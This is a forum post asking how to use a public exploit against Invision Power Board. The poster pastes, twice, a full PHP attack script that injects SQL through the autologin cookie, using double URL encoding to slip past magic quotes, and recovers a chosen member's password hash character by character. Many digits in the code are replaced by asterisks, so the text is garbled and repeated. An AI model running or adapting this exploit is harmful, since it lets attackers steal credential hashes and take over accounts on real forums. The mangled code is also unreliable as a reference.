mooman13591
07-07-2006, 09:53 PM
I have IPB *.*.* Final...
Go here: http://www.securiteam.com/exploits/5AP0G0KG0A.html ( here: http://www.milw0rm.com/id.php?id=*0*6 )
I really need to test this on my IPB to see if it works, but what does this all mean? To I put it in my coading for my ***rd, or in my cookie folder(if so, what should the cookie name be?)?
For everyone that doesn't viset the links, here:
<?php
/*
<= *.*.* Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 8*;
/* User id and password used to fake-logon are not important. '*0' is a
random number. */
$id = *0;
$pass = "";
$hex = "0*2*45678*abcdef";
for($i = *; $i <= *2; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, *);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,*)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,*)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/*.*\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 5*2);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
Could someone help me? :(
Go here: http://www.securiteam.com/exploits/5AP0G0KG0A.html ( here: http://www.milw0rm.com/id.php?id=*0*6 )
I really need to test this on my IPB to see if it works, but what does this all mean? To I put it in my coading for my ***rd, or in my cookie folder(if so, what should the cookie name be?)?
For everyone that doesn't viset the links, here:
<?php
/*
<= *.*.* Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 8*;
/* User id and password used to fake-logon are not important. '*0' is a
random number. */
$id = *0;
$pass = "";
$hex = "0*2*45678*abcdef";
for($i = *; $i <= *2; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, *);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,*)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,*)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/*.*\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 5*2);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
Could someone help me? :(